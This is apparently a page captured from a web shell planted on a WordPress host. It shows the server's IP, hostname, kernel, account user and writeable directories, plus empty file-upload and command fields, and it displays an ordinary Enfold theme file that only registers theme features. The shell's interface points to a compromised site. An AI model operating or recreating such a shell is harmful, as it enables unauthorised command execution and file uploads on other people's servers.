403Webshell
Server IP : 81.19.159.101  /  Your IP : 216.73.217.111
Web Server : Apache
System : Linux www58.world4you.com 4.18.0-553.126.2.lve.el8.x86_64 #1 SMP Thu May 28 14:12:30 UTC 2026 x86_64
User : ftp8817043 ( 2681)
PHP Version : 8.4.21
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/.sites/103/site8817043/web/wp-content/themes/enfold/includes/config-enfold/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/.sites/103/site8817043/web/wp-content/themes/enfold/includes/config-enfold/init-support.php
<?php
/*
 * This helper file initialises theme support to WP, functionality of theme and plugins
 * Moved from functions.php
 *
 * @since 7.0
 * @added_by Günter
 */
if( ! defined( 'ABSPATH' ) ) {  exit;  }    // Exit if accessed directly


/*
 * add support for responsive mega menus
 */
add_theme_support( 'avia_mega_menu' );

/*
 * add support for improved backend styling
 */
add_theme_support( 'avia_improved_backend_style' );

/**
 * add support for toggles in framework option pages instead of checkboxes
 *
 * @since 4.6.3
 */
add_theme_support( 'avia_option_pages_toggles' );

/**
 * add support for toggles in ALB modal popup instead of checkboxes
 *
 * @since x.x.x
 */
add_theme_support( 'avia_alb_checkbox_toggles' );

/*
 * adds support for the new avia sidebar manager
 */
add_theme_support( 'avia_sidebar_manager' );

/**
 *
 */
add_theme_support( 'automatic-feed-links' );

/*
 *  add post format options
 */
add_theme_support( 'post-formats', array( 'link', 'quote', 'gallery', 'video', 'image', 'audio' ) );

/*
 * compat mode for easier theme switching from one avia framework theme to another
 */
add_theme_support( 'avia_post_meta_compat' );

/*
 * make sure that enfold widgets dont use the old slideshow parameter in widgets, but default post thumbnails
 */
add_theme_support( 'force-post-thumbnails-in-widget' );

/*
 * display page titles via wordpress default output
 *
 * @since 3.6
 */
add_theme_support( 'title-tag' );

/**
 * display custom nav menus
 */
add_theme_support( 'nav_menus' );


add_post_type_support( 'page', 'excerpt' );

/**
 * add support for post thumbnails
 */
add_theme_support( 'post-thumbnails' );


Youez - 2016 - github.com/yon3zu
LinuXploit